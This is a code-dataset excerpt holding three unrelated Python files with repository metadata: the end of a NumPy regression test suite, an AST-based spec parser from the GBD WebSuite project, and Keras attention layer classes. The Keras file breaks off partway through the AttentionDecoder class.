assert_(np.array(1.0).flags.c_contiguous)
assert_(np.array(1.0).flags.f_contiguous)
assert_(np.array(np.float32(1.0)).flags.c_contiguous)
assert_(np.array(np.float32(1.0)).flags.f_contiguous)
def test_squeeze_contiguous(self):
"""Similar to GitHub issue #387"""
a = np.zeros((1, 2)).squeeze()
b = np.zeros((2, 2, 2), order='F')[:,:, ::2].squeeze()
assert_(a.flags.c_contiguous)
assert_(a.flags.f_contiguous)
assert_(b.flags.f_contiguous)
def test_reduce_contiguous(self):
"""GitHub issue #387"""
a = np.add.reduce(np.zeros((2, 1, 2)), (0, 1))
b = np.add.reduce(np.zeros((2, 1, 2)), 1)
assert_(a.flags.c_contiguous)
assert_(a.flags.f_contiguous)
assert_(b.flags.c_contiguous)
def test_object_array_self_reference(self):
# Object arrays with references to themselves can cause problems
a = np.array(0, dtype=object)
a[()] = a
assert_raises(TypeError, int, a)
assert_raises(TypeError, long, a)
assert_raises(TypeError, float, a)
assert_raises(TypeError, oct, a)
assert_raises(TypeError, hex, a)
# This was causing a to become like the above
a = np.array(0, dtype=object)
a[...] += 1
assert_equal(a, 1)
def test_zerosize_accumulate(self):
"Ticket #1733"
x = np.array([[42, 0]], dtype=np.uint32)
assert_equal(np.add.accumulate(x[:-1, 0]), [])
def test_objectarray_setfield(self):
# Setfield directly manipulates the raw array data,
# so is invalid for object arrays.
x = np.array([1, 2, 3], dtype=object)
assert_raises(RuntimeError, x.setfield, 4, np.int32, 0)
def test_setting_rank0_string(self):
"Ticket #1736"
s1 = asbytes("hello1")
s2 = asbytes("hello2")
a = np.zeros((), dtype="S10")
a[()] = s1
assert_equal(a, np.array(s1))
a[()] = np.array(s2)
assert_equal(a, np.array(s2))
a = np.zeros((), dtype='f4')
a[()] = 3
assert_equal(a, np.array(3))
a[()] = np.array(4)
assert_equal(a, np.array(4))
def test_string_astype(self):
"Ticket #1748"
s1 = asbytes('black')
s2 = asbytes('white')
s3 = asbytes('other')
a = np.array([[s1], [s2], [s3]])
assert_equal(a.dtype, np.dtype('S5'))
b = a.astype(np.dtype('S0'))
assert_equal(b.dtype, np.dtype('S5'))
def test_ticket_1756(self):
"""Ticket #1756 """
s = asbytes('0123456789abcdef')
a = np.array([s]*5)
for i in range(1, 17):
a1 = np.array(a, "|S%d"%i)
a2 = np.array([s[:i]]*5)
assert_equal(a1, a2)
def test_fields_strides(self):
"Ticket #1760"
        r = np.fromstring('abcdefghijklmnop'*4*3, dtype='i4,(2,3)u2')
assert_equal(r[0:3:2]['f1'], r['f1'][0:3:2])
assert_equal(r[0:3:2]['f1'][0], r[0:3:2][0]['f1'])
assert_equal(r[0:3:2]['f1'][0][()], r[0:3:2][0]['f1'][()])
assert_equal(r[0:3:2]['f1'][0].strides, r[0:3:2][0]['f1'].strides)
def test_alignment_update(self):
"""Check that alignment flag is updated on stride setting"""
a = np.arange(10)
assert_(a.flags.aligned)
a.strides = 3
assert_(not a.flags.aligned)
def test_ticket_1770(self):
"Should not segfault on python 3k"
import numpy as np
try:
a = np.zeros((1,), dtype=[('f1', 'f')])
a['f1'] = 1
a['f2'] = 1
except ValueError:
pass
except:
raise AssertionError
def test_ticket_1608(self):
"x.flat shouldn't modify data"
x = np.array([[1, 2], [3, 4]]).T
y = np.array(x.flat)
assert_equal(x, [[1, 3], [2, 4]])
def test_pickle_string_overwrite(self):
import re
data = np.array([1], dtype='b')
blob = pickle.dumps(data, protocol=1)
data = pickle.loads(blob)
# Check that loads does not clobber interned strings
s = re.sub("a(.)", "\x01\\1", "a_")
assert_equal(s[0], "\x01")
data[0] = 0xbb
s = re.sub("a(.)", "\x01\\1", "a_")
assert_equal(s[0], "\x01")
def test_pickle_bytes_overwrite(self):
if sys.version_info[0] >= 3:
data = np.array([1], dtype='b')
data = pickle.loads(pickle.dumps(data))
data[0] = 0xdd
bytestring = "\x01 ".encode('ascii')
assert_equal(bytestring[0:1], '\x01'.encode('ascii'))
def test_structured_type_to_object(self):
a_rec = np.array([(0, 1), (3, 2)], dtype='i4,i8')
a_obj = np.empty((2,), dtype=object)
a_obj[0] = (0, 1)
a_obj[1] = (3, 2)
# astype records -> object
assert_equal(a_rec.astype(object), a_obj)
# '=' records -> object
b = np.empty_like(a_obj)
b[...] = a_rec
assert_equal(b, a_obj)
# '=' object -> records
b = np.empty_like(a_rec)
b[...] = a_obj
assert_equal(b, a_rec)
def test_assign_obj_listoflists(self):
# Ticket # 1870
# The inner list should get assigned to the object elements
a = np.zeros(4, dtype=object)
b = a.copy()
a[0] = [1]
a[1] = [2]
a[2] = [3]
a[3] = [4]
b[...] = [[1], [2], [3], [4]]
assert_equal(a, b)
# The first dimension should get broadcast
a = np.zeros((2, 2), dtype=object)
a[...] = [[1, 2]]
assert_equal(a, [[1, 2], [1, 2]])
def test_memoryleak(self):
# Ticket #1917 - ensure that array data doesn't leak
for i in range(1000):
# 100MB times 1000 would give 100GB of memory usage if it leaks
a = np.empty((100000000,), dtype='i1')
del a
def test_ufunc_reduce_memoryleak(self):
a = np.arange(6)
acnt = sys.getrefcount(a)
res = np.add.reduce(a)
assert_equal(sys.getrefcount(a), acnt)
def test_search_sorted_invalid_arguments(self):
# Ticket #2021, should not segfault.
x = np.arange(0, 4, dtype='datetime64[D]')
assert_raises(TypeError, x.searchsorted, 1)
def test_string_truncation(self):
# Ticket #1990 - Data can be truncated in creation of an array from a
# mixed sequence of numeric values and strings
for val in [True, 1234, 123.4, complex(1, 234)]:
for tostr in [asunicode, asbytes]:
b = np.array([val, tostr('xx')])
assert_equal(tostr(b[0]), tostr(val))
b = np.array([tostr('xx'), val])
assert_equal(tostr(b[1]), tostr(val))
# test also with longer strings
b = np.array([val, tostr('xxxxxxxxxx')])
assert_equal(tostr(b[0]), tostr(val))
b = np.array([tostr('xxxxxxxxxx'), val])
assert_equal(tostr(b[1]), tostr(val))
def test_string_truncation_ucs2(self):
# Ticket #2081. Python compiled with two byte unicode
# can lead to truncation if itemsize is not properly
# adjusted for Numpy's four byte unicode.
if sys.version_info[0] >= 3:
a = np.array(['abcd'])
else:
a = np.array([sixu('abcd')])
assert_equal(a.dtype.itemsize, 16)
def test_unique_stable(self):
# Ticket #2063 must always choose stable sort for argsort to
# get consistent results
v = np.array(([0]*5 + [1]*6 + [2]*6)*4)
res = np.unique(v, return_index=True)
tgt = (np.array([0, 1, 2]), np.array([ 0, 5, 11]))
assert_equal(res, tgt)
def test_unicode_alloc_dealloc_match(self):
# Ticket #1578, the mismatch only showed up when running
# python-debug for python versions >= 2.7, and then as
# a core dump and error message.
a = np.array(['abc'], dtype=np.unicode)[0]
del a
def test_refcount_error_in_clip(self):
# Ticket #1588
a = np.zeros((2,), dtype='>i2').clip(min=0)
x = a + a
# This used to segfault:
y = str(x)
# Check the final string:
assert_(y == "[0 0]")
def test_searchsorted_wrong_dtype(self):
# Ticket #2189, it used to segfault, so we check that it raises the
# proper exception.
a = np.array([('a', 1)], dtype='S1, int')
assert_raises(TypeError, np.searchsorted, a, 1.2)
# Ticket #2066, similar problem:
dtype = np.format_parser(['i4', 'i4'], [], [])
a = np.recarray((2, ), dtype)
assert_raises(TypeError, np.searchsorted, a, 1)
def test_complex64_alignment(self):
# Issue gh-2668 (trac 2076), segfault on sparc due to misalignment
dtt = np.complex64
arr = np.arange(10, dtype=dtt)
# 2D array
arr2 = np.reshape(arr, (2, 5))
# Fortran write followed by (C or F) read caused bus error
data_str = arr2.tostring('F')
data_back = np.ndarray(arr2.shape,
arr2.dtype,
buffer=data_str,
order='F')
assert_array_equal(arr2, data_back)
def test_structured_count_nonzero(self):
arr = np.array([0, 1]).astype('i4, (2)i4')[:1]
count = np.count_nonzero(arr)
assert_equal(count, 0)
def test_copymodule_preserves_f_contiguity(self):
a = np.empty((2, 2), order='F')
b = copy.copy(a)
c = copy.deepcopy(a)
assert_(b.flags.fortran)
assert_(b.flags.f_contiguous)
assert_(c.flags.fortran)
assert_(c.flags.f_contiguous)
if __name__ == "__main__":
run_module_suite()
| 35.894241
| 92
| 0.544313
|
3803559bbc0dd9666aba6a4127cfc243449e0567
| 18,826
|
py
|
Python
|
app/gws/spec/generator/parser.py
|
gbd-consult/gbd-websuite
|
7212f41081c04614fdb4641e902d4de3424da8c5
|
[
"Apache-2.0"
] | 3
|
2020-07-24T10:10:18.000Z
|
2022-03-16T10:22:04.000Z
|
app/gws/spec/generator/parser.py
|
gbd-consult/gbd-websuite
|
7212f41081c04614fdb4641e902d4de3424da8c5
|
[
"Apache-2.0"
] | 28
|
2020-03-03T17:35:58.000Z
|
2021-07-12T12:05:47.000Z
|
app/gws/spec/generator/parser.py
|
gbd-consult/gbd-websuite
|
7212f41081c04614fdb4641e902d4de3424da8c5
|
[
"Apache-2.0"
] | 1
|
2021-02-22T14:32:10.000Z
|
2021-02-22T14:32:10.000Z
|
"""Parse py source files and create a list of units of interest"""
import ast
from typing import Dict, List, cast
from . import base
def parse(state: base.ParserState, meta):
for b in base.BUILTINS:
state.types[b] = base.TAtom(name=b)
state.types['TUncheckedEnum'] = base.TAtom(name='str')
for chunk in meta.chunks:
for path in chunk.paths['python']:
parser = None
try:
mod_name = _module_name(chunk, path)
text = read_file(path)
parser = _Parser(state, mod_name, path, text, meta)
parser.run()
except Exception as e:
lineno = '?'
if parser and parser.context:
lineno = parser.context[-1].lineno
msg = repr(e)
if hasattr(e, 'args'):
msg = str(e.args[0])
raise base.Error(f'{msg} in {path}:{lineno}')
##
def read_file(path):
with open(path, 'rt', encoding='utf8') as fp:
return fp.read().strip()
def write_file(path, text):
with open(path, 'wt', encoding='utf8') as fp:
fp.write(text)
##
DOT = '.'
class _Parser:
buf: str
lines: List[str]
module_node: ast.Module
module_name: str
docs: Dict[int, str]
imports: Dict[str, str]
def __init__(self, state, module_name: str, path: str, text: str, meta):
self.state: base.ParserState = state
self.module_name = module_name
self.module_path = path
self.text = text
self.lines = [''] + self.text.splitlines()
self.is_init = path.endswith('__init__.py')
self.context: List = []
self.meta = meta
def run(self):
tree = ast.parse(self.text)
for node in ast.walk(tree):
if _cls(node) == 'Module':
self.module_node = cast(ast.Module, node)
break
else:
raise ValueError('module node not found')
self.docs = self.prepare_docs()
self.imports = self.prepare_imports()
for node in self.nodes('module', 'ClassDef'):
self.parse_class(node)
for node in self.nodes('module', 'Assign'):
self.parse_type_alias(node)
##
def prepare_docs(self):
# comments can be placed before the prop like "#: blah <nl>foo"
# or inline like "foo #: blah"
cmt = '#:'
docs = {}
for n, ln in enumerate(self.lines):
ln = ln.strip()
if ln.startswith(cmt):
docs[n + 1] = ln.split(cmt)[1].strip()
elif cmt in ln:
docs[n] = ln.split(cmt)[1].strip()
return docs
def prepare_imports(self):
# map import names to module names
imp = {}
# "import a.b.c as foo" => {foo: a.b.c}
for node in self.nodes('module', 'Import'):
for nn in node.names:
imp[nn.asname or nn.name] = nn.name
for node in self.nodes('module', 'ImportFrom'):
# "from a.b.c import foo" => {foo: a.b.c.foo}
if node.level == 0:
for nn in node.names:
imp[nn.asname or nn.name] = node.module + DOT + nn.name
continue
# "from . import foo" => {foo: "<mod-name>.{
# "from .. import foo" => "<mod-name-before-dot>.foo"
# "from ..abc import foo" => "<mod-name-before-dot>.abc.foo"
m = self.module_name.split(DOT)
level = node.level - self.is_init
if level:
m = m[:-level]
m = DOT.join(m)
if node.module:
m += DOT + node.module
for nn in node.names:
imp[nn.asname or nn.name] = m + DOT + nn.name
# create alias specs for imported types
for alias, target in imp.items():
if _is_type_name(alias):
self.state.aliases[self.module_name + DOT + alias] = target
return imp
##
def parse_type_alias(self, node):
"""Parse a type alias TypeA = TypeB"""
name_node = node.targets[0]
if len(node.targets) > 1 or _cls(name_node) != 'Name' or not _is_type_name(name_node.id):
return
# we only accept aliases that have documentation strings '#: ...'
doc = self.doc_for(node)
if not doc:
return
target_type = self.type_from_node(node.value)
# mypy doesn't accept aliases to special forms,
# so we cannot use Variant = Union
# instead, if the type is Union, look in the comment string for 'Variant'
if isinstance(target_type, base.TUnion) and 'Variant' in doc:
target_type = base.TVariantStub(items=target_type.items, pos=self.pos)
self.add(target_type)
self.add(base.TAlias(
doc=doc,
ident=name_node.id,
name=self.qname(name_node),
pos=self.pos,
target_t=target_type.name,
))
def parse_class(self, node):
if not _is_type_name(node.name):
return
supers = [self.qname(b) for b in node.bases]
if supers and (supers[0] == 'Enum' or supers[0].endswith('.Enum')):
return self.parse_enum(node)
spec = base.TRecord(
doc=_docstring(node),
ident=node.name,
name=self.qname(node),
pos=self.pos,
ext_category='',
ext_kind='',
ext_type='',
supers=[self.type_from_name(s).name for s in supers],
)
d = self.class_decorator(node)
if d:
spec.ext_category = d.category
spec.ext_kind = d.kind
spec.ext_type = d.type
self.add(spec)
for nn in self.nodes(node.body, 'Assign'):
self.parse_property(spec, nn, annotated=False)
for nn in self.nodes(node.body, 'AnnAssign'):
self.parse_property(spec, nn, annotated=True)
for nn in self.nodes(node.body, 'FunctionDef'):
d = self.function_decorator(nn)
if d and d.kind == 'command':
self.parse_command(spec, nn, d.name)
def parse_enum(self, node):
docs = {}
values = {}
for nn in self.nodes(node.body, 'Assign'):
ident = nn.targets[0].id
ok, val = self.parse_value(nn.value)
if not ok or not _is_scalar(val):
raise ValueError(f'invalid Enum item {ident!r}')
docs[ident] = self.doc_for(nn)
values[ident] = val
self.add(base.TEnum(
doc=_docstring(node),
ident=node.name,
name=self.qname(node),
pos=self.pos,
docs=docs,
values=values,
))
def parse_property(self, owner_type: base.Type, node, annotated: bool):
ident = node.target.id if annotated else node.targets[0].id
if ident.startswith('_'):
return
has_default, default = self.parse_value(node.value)
spec = base.TProperty(
doc=self.doc_for(node),
ident=ident,
name=owner_type.name + DOT + ident,
pos=self.pos,
default=None,
has_default=has_default,
owner_t=owner_type.name,
property_t='any',
)
if has_default:
spec.default = default
property_type = None
if hasattr(node, 'annotation'):
property_type = self.type_from_node(node.annotation)
if not property_type:
typ = 'any'
if spec.has_default and spec.default is not None:
typ = type(spec.default).__name__
property_type = self.type_from_name(typ)
if property_type:
if isinstance(property_type, base.TOptional):
spec.property_t = property_type.target_t
if not spec.has_default:
spec.has_default = True
spec.default = None
else:
spec.property_t = property_type.name
self.add(spec)
def parse_command(self, owner_type: base.Type, node, command_name: str):
# command names are strictly three parts: method . action . name
        # e.g. 'cli.server.restart'
method, action, cmd = command_name.split(DOT)
spec = base.TCommand(
doc=_docstring(node),
ident=node.name,
name=method + DOT + action + _ucfirst(cmd), # cli.serverRestart
pos=self.pos,
owner_t=owner_type.name,
cmd_action=action, # server
cmd_command=cmd, # restart
cmd_method=method,
cmd_name=action + _ucfirst(cmd), # serverRestart
ext_type=cast(base.TRecord, owner_type).ext_type,
arg_t='any',
ret_t='any',
)
# action methods have only one spec'able arg (the last one)
arg_node = node.args.args[-1]
if arg_node.annotation:
arg_type = self.type_from_node(arg_node.annotation)
spec.arg_t = arg_type.name if arg_type else 'any'
if node.returns:
ret_type = self.type_from_node(node.returns)
spec.ret_t = ret_type.name if ret_type else 'any'
self.add(spec)
def class_decorator(self, node):
d = self.gws_decorator(node)
if not d:
return
# e.g. gws.ext.Config('db.provider.foo')
fn_parts = self.qname(d.func).split(DOT)
ok, arg = self.parse_value(d.args[0])
if not ok:
raise ValueError('invalid argument')
arg_parts = arg.split(DOT)
return base.Data(
category=DOT.join(arg_parts[:-1]), # 'db.provider'
type=arg_parts[-1], # 'foo'
kind=fn_parts[-1], # 'Config'
name=DOT.join(fn_parts[:-1] + arg_parts + fn_parts[-1:]), # 'gws.ext.db.provider.foo.Config'
)
def function_decorator(self, node):
d = self.gws_decorator(node)
if not d:
return
# e.g. gws.ext.command('api.map.renderXYZ')
fn_parts = self.qname(d.func).split(DOT)
kind = fn_parts[-1]
if kind == 'command':
if not d.args:
raise ValueError('invalid argument')
ok, arg = self.parse_value(d.args[0])
if not ok:
raise ValueError('invalid argument')
return base.Data(kind=kind, name=arg)
raise ValueError(f'invalid decorator: "{kind}"')
def gws_decorator(self, node):
for d in getattr(node, 'decorator_list', []):
if _cls(d) == 'Call' and self.qname(d.func).startswith(base.GWS_EXT_PREFIX + DOT):
return d
##
def type_from_node(self, node) -> base.Type:
# here, node is a type declaration (an alias or an annotation)
cc = _cls(node)
# foo: SomeType
if cc in {'Str', 'Name', 'Attribute', 'Constant'}:
return self.type_from_name(self.qname(node))
# foo: Generic[SomeType]
if cc == 'Subscript':
return self.type_from_name(self.qname(node.value), node.slice.value)
# foo: [SomeType, SomeType]
if cc in {'List', 'Tuple'}:
items = [self.type_from_node(e) for e in node.elts]
return self.add(base.TTuple(items=[it.name for it in items]))
raise ValueError(f'unsupported type: {cc!r}')
def type_from_name(self, name: str, param=None) -> base.Type:
if name in self.state.types:
return self.state.types[name]
g = name.split(DOT)[-1].lower()
if g == 'any':
return self.state.types['any']
# literal - 'param' is a value or a tuple of values
if g == 'literal':
if not param:
raise ValueError('invalid literal')
values = []
elts = param.elts if _cls(param) == 'Tuple' else [param]
for elt in elts:
values.append(self.parse_literal_value(elt))
return self.add(base.TLiteral(values=values))
# in other cases, 'param' is a type or a tuple of types
param_type = self.type_from_node(param) if param else None
param_tuple = None
if isinstance(param_type, base.TTuple):
param_tuple = param_type.items
if g == 'optional':
if not param_type:
raise ValueError('invalid optional type')
return self.add(base.TOptional(target_t=param_type.name))
if g == 'list':
return self.add(base.TList(item_t=param_type.name if param_type else 'any'))
if g == 'set':
return self.add(base.TSet(item_t=param_type.name if param_type else 'any'))
if g == 'dict':
if param_tuple:
if len(param_tuple) != 2:
raise ValueError('invalid Dict arguments')
key, val = param_tuple
if key != 'str':
raise ValueError('Dict keys must be str')
elif param_type:
key = 'str'
val = param_type.name
else:
key = 'str'
val = 'any'
return self.add(base.TDict(key_t=key, value_t=val))
if g == 'union':
if not param_tuple:
raise ValueError('invalid Union')
return self.add(base.TUnion(items=sorted(param_tuple)))
if g == 'tuple':
if not param_type:
return self.add(base.TTuple(items=[]))
if not param_tuple:
raise ValueError('invalid Tuple')
return self.add(base.TTuple(items=param_tuple))
if param:
raise ValueError('invalid generic type')
return self.add(base.TUnresolvedReference(name=name))
##
@property
def pos(self):
return {
'module_name': self.module_name,
'module_path': self.module_path,
'lineno': self.context[-1].lineno if self.context else 0,
}
def add(self, t: base.Type) -> base.Type:
if not hasattr(t, 'pos'):
setattr(t, 'pos', self.pos)
self.state.types[t.name] = t
return t
def doc_for(self, node):
if node.lineno in self.docs:
return self.docs[node.lineno]
return ''
def qname(self, node):
name = self.node_name(node)
if name in base.BUILTINS:
return name
name = self.qualified(name)
return name
def qualified(self, name):
for alias, mod in self.imports.items():
if name == mod or name.startswith(mod + DOT):
return name
if name == alias:
return mod
if name.startswith(alias + DOT):
return mod + DOT + name[(len(alias) + 1):]
return self.module_name + DOT + name
def node_name(self, node):
if _cls(node) == 'Name':
return node.id
if _cls(node) == 'Attribute':
return self.node_name(node.value) + DOT + node.attr
if _cls(node) == 'Str':
return node.s
if _cls(node) == 'Constant':
v = node.value
return v if isinstance(v, str) else repr(v)
if _cls(node) == 'ClassDef':
return node.name
raise ValueError('cannot find a node name')
def nodes(self, where, *cls):
if where == 'module':
where = self.module_node.body
for node in where:
if not cls or _cls(node) in cls:
self.context.append(node)
yield node
self.context.pop()
##
def parse_value(self, node):
if node is None:
return False, None
cc = _cls(node)
if cc == 'Num':
return True, node.n
if cc in ('Str', 'Bytes'):
return True, node.s
if cc in ('Constant', 'NameConstant'):
return True, node.value
if cc == 'List':
vals = []
for elt in node.elts:
ok, val = self.parse_value(elt)
if not ok:
raise ValueError(f'invalid list element')
vals.append(val)
return True, vals
if cc == 'Dict':
dct = {}
for k, v in zip(node.keys, node.values):
ok1, key = self.parse_value(k)
ok2, val = self.parse_value(v)
if not ok1 or not ok2:
raise ValueError(f'invalid dict element')
dct[key] = val
return True, dct
if cc == 'Attribute':
# Something.someKey - possible enum value
return True, base.TUncheckedEnum(name=self.qname(node))
base.debug_log(f'unparsed value {cc!r}', base.Data(pos=self.pos))
return False, None
def parse_literal_value(self, node):
cc = _cls(node)
if cc == 'Num':
return node.n
if cc in ('Str', 'Bytes'):
return node.s
if cc in ('Constant', 'NameConstant'):
return node.value
raise ValueError(f'invalid literal value of type {cc!r}')
##
def _module_name(chunk, path):
# <chunk.sourceDir>/a/b/c.py => <chunk.name>.a.b.c
if not path.startswith(chunk.sourceDir):
raise ValueError(f'invalid path {path!r}')
p = path[len(chunk.sourceDir):].split('/')
f = p.pop().split(DOT)[0]
if f != '__init__':
p.append(f)
return chunk.name + DOT.join(p)
def _docstring(node):
try:
b = node.body[0]
if _cls(b) == 'Expr' and _cls(b.value) in ('Constant', 'Str'):
return b.value.s.strip()
except:
pass
return ''
def _is_scalar(val):
return isinstance(val, (str, bytes, int, float, bool))
def _is_type_name(name: str) -> bool:
return (
bool(name)
and name[0].isupper()
        and all(s.isupper() or s.islower() or s.isdigit() for s in name)
and any(s.islower() for s in name)
)
def _is_a(full_name: str, name: str) -> bool:
# if the name is like 'Object', check if the full name ends with it
# if the name is like 'some.module', check if the full name starts with it
if name[0].isupper():
return full_name == name or full_name.endswith(DOT + name)
return full_name == name or full_name.startswith(name + DOT)
def _cls(node):
return node.__class__.__name__
def _camelize(name):
p = name.split('_')
return p[0] + ''.join(_ucfirst(s) for s in p[1:])
def _ucfirst(s):
return s[0].upper() + s[1:]
_comma = ','.join
| 30.218299
| 105
| 0.537289
|
4e09750451d64d4910c72f9a08e8e6d5dbdf5222
| 24,222
|
py
|
Python
|
layers/attention.py
|
sdadas/yast
|
f9cd471ae3c915acb8111dd85a53acc72348c355
|
[
"Apache-2.0"
] | 2
|
2018-12-18T03:12:13.000Z
|
2018-12-31T18:03:27.000Z
|
layers/attention.py
|
sdadas/yast
|
f9cd471ae3c915acb8111dd85a53acc72348c355
|
[
"Apache-2.0"
] | 6
|
2020-01-28T21:59:18.000Z
|
2022-02-09T23:29:00.000Z
|
layers/attention.py
|
sdadas/yast
|
f9cd471ae3c915acb8111dd85a53acc72348c355
|
[
"Apache-2.0"
] | 1
|
2020-07-07T18:25:15.000Z
|
2020-07-07T18:25:15.000Z
|
from keras import initializers, regularizers, constraints, activations
from keras.engine import Layer, InputSpec
from keras import backend as K
from keras.layers.recurrent import Recurrent
"""
Keras attention layers created by Christos Baziotis (https://github.com/cbaziotis)
- see https://github.com/keras-team/keras/issues/4962
Attention()
Keras Layer that implements an Attention mechanism for temporal data. Supports Masking.
Follows the work of Raffel et al. [https://arxiv.org/abs/1512.08756]
AttentionWithContext()
Keras Layer that implements an Attention mechanism, with a context/query vector, for temporal data. Supports Masking.
Follows the work of Yang et al. [https://www.cs.cmu.edu/~diyiy/docs/naacl16.pdf]
"Hierarchical Attention Networks for Document Classification"
"""
def dot_product(x, kernel):
"""
Wrapper for dot product operation, in order to be compatible with both
Theano and Tensorflow
Args:
x (): input
kernel (): weights
Returns:
"""
if K.backend() == 'tensorflow':
return K.squeeze(K.dot(x, K.expand_dims(kernel)), axis=-1)
else:
return K.dot(x, kernel)
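# Shape note (for illustration): with x of shape (samples, steps, features) and
# kernel of shape (features,), both branches return a (samples, steps) tensor of
# unnormalized attention scores.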
class Attention(Layer):
def __init__(self,
W_regularizer=None, b_regularizer=None,
W_constraint=None, b_constraint=None,
bias=True, **kwargs):
"""
Keras Layer that implements an Attention mechanism for temporal data.
Supports Masking.
Follows the work of Raffel et al. [https://arxiv.org/abs/1512.08756]
# Input shape
3D tensor with shape: `(samples, steps, features)`.
# Output shape
2D tensor with shape: `(samples, features)`.
:param kwargs:
Just put it on top of an RNN Layer (GRU/LSTM/SimpleRNN) with return_sequences=True.
The dimensions are inferred based on the output shape of the RNN.
Note: The layer has been tested with Keras 2.0.6
Example:
model.add(LSTM(64, return_sequences=True))
model.add(Attention())
# next add a Dense layer (for classification/regression) or whatever...
"""
self.supports_masking = True
self.init = initializers.get('glorot_uniform')
self.W_regularizer = regularizers.get(W_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
self.W_constraint = constraints.get(W_constraint)
self.b_constraint = constraints.get(b_constraint)
self.bias = bias
super(Attention, self).__init__(**kwargs)
def build(self, input_shape):
assert len(input_shape) == 3
self.W = self.add_weight((input_shape[-1],),
initializer=self.init,
name='{}_W'.format(self.name),
regularizer=self.W_regularizer,
constraint=self.W_constraint)
if self.bias:
self.b = self.add_weight((input_shape[1],),
initializer='zero',
name='{}_b'.format(self.name),
regularizer=self.b_regularizer,
constraint=self.b_constraint)
else:
self.b = None
self.built = True
def compute_mask(self, input, input_mask=None):
# do not pass the mask to the next layers
return None
def call(self, x, mask=None):
eij = dot_product(x, self.W)
if self.bias:
eij += self.b
eij = K.tanh(eij)
a = K.exp(eij)
# apply mask after the exp. will be re-normalized next
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
a *= K.cast(mask, K.floatx())
# in some cases especially in the early stages of training the sum may be almost zero
# and this results in NaN's. A workaround is to add a very small positive number ε to the sum.
# a /= K.cast(K.sum(a, axis=1, keepdims=True), K.floatx())
a /= K.cast(K.sum(a, axis=1, keepdims=True) + K.epsilon(), K.floatx())
a = K.expand_dims(a)
weighted_input = x * a
return K.sum(weighted_input, axis=1)
def compute_output_shape(self, input_shape):
return input_shape[0], input_shape[-1]
def get_config(self):
config = {
'W_regularizer': regularizers.serialize(self.W_regularizer),
'b_regularizer': regularizers.serialize(self.b_regularizer),
'W_constraint': constraints.serialize(self.W_constraint),
'b_constraint': constraints.serialize(self.b_constraint),
'bias': self.bias
}
base_config = super(Attention, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class AttentionWithContext(Layer):
"""
Attention operation, with a context/query vector, for temporal data.
Supports Masking.
Follows the work of Yang et al. [https://www.cs.cmu.edu/~diyiy/docs/naacl16.pdf]
"Hierarchical Attention Networks for Document Classification"
by using a context vector to assist the attention
# Input shape
3D tensor with shape: `(samples, steps, features)`.
# Output shape
2D tensor with shape: `(samples, features)`.
How to use:
Just put it on top of an RNN Layer (GRU/LSTM/SimpleRNN) with return_sequences=True.
The dimensions are inferred based on the output shape of the RNN.
Note: The layer has been tested with Keras 2.0.6
Example:
model.add(LSTM(64, return_sequences=True))
model.add(AttentionWithContext())
# next add a Dense layer (for classification/regression) or whatever...
"""
def __init__(self,
W_regularizer=None, u_regularizer=None, b_regularizer=None,
W_constraint=None, u_constraint=None, b_constraint=None,
bias=True, **kwargs):
self.supports_masking = True
self.init = initializers.get('glorot_uniform')
self.W_regularizer = regularizers.get(W_regularizer)
self.u_regularizer = regularizers.get(u_regularizer)
self.b_regularizer = regularizers.get(b_regularizer)
self.W_constraint = constraints.get(W_constraint)
self.u_constraint = constraints.get(u_constraint)
self.b_constraint = constraints.get(b_constraint)
self.bias = bias
super(AttentionWithContext, self).__init__(**kwargs)
def build(self, input_shape):
assert len(input_shape) == 3
self.W = self.add_weight((input_shape[-1], input_shape[-1],),
initializer=self.init,
name='{}_W'.format(self.name),
regularizer=self.W_regularizer,
constraint=self.W_constraint)
if self.bias:
self.b = self.add_weight((input_shape[-1],),
initializer='zero',
name='{}_b'.format(self.name),
regularizer=self.b_regularizer,
constraint=self.b_constraint)
self.u = self.add_weight((input_shape[-1],),
initializer=self.init,
name='{}_u'.format(self.name),
regularizer=self.u_regularizer,
constraint=self.u_constraint)
super(AttentionWithContext, self).build(input_shape)
def compute_mask(self, input, input_mask=None):
# do not pass the mask to the next layers
return None
def call(self, x, mask=None):
uit = dot_product(x, self.W)
if self.bias:
uit += self.b
uit = K.tanh(uit)
ait = K.dot(uit, self.u)
a = K.exp(ait)
# apply mask after the exp. will be re-normalized next
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
a *= K.cast(mask, K.floatx())
# in some cases especially in the early stages of training the sum may be almost zero
# and this results in NaN's. A workaround is to add a very small positive number ε to the sum.
# a /= K.cast(K.sum(a, axis=1, keepdims=True), K.floatx())
a /= K.cast(K.sum(a, axis=1, keepdims=True) + K.epsilon(), K.floatx())
a = K.expand_dims(a)
weighted_input = x * a
return K.sum(weighted_input, axis=1)
def compute_output_shape(self, input_shape):
return input_shape[0], input_shape[-1]
class AttentionDecoder(Recurrent):
def __init__(self, units, output_dim,
activation='tanh',
return_probabilities=False,
name='AttentionDecoder',
kernel_initializer='glorot_uniform',
recurrent_initializer='orthogonal',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
"""
Implements an AttentionDecoder that takes in a sequence encoded by an
encoder and outputs the decoded states
:param units: dimension of the hidden state and the attention matrices
:param output_dim: the number of labels in the output space
references:
Bahdanau, Dzmitry, Kyunghyun Cho, and Yoshua Bengio.
"Neural machine translation by jointly learning to align and translate."
arXiv preprint arXiv:1409.0473 (2014).
"""
self.units = units
self.output_dim = output_dim
self.return_probabilities = return_probabilities
self.activation = activations.get(activation)
self.kernel_initializer = initializers.get(kernel_initializer)
self.recurrent_initializer = initializers.get(recurrent_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.recurrent_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.recurrent_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
super(AttentionDecoder, self).__init__(**kwargs)
self.name = name
self.return_sequences = True # must return sequences
def build(self, input_shape):
"""
See Appendix 2 of Bahdanau 2014, arXiv:1409.0473
for model details that correspond to the matrices here.
"""
self.batch_size, self.timesteps, self.input_dim = input_shape
if self.stateful:
super(AttentionDecoder, self).reset_states()
self.states = [None, None] # y, s
"""
Matrices for creating the context vector
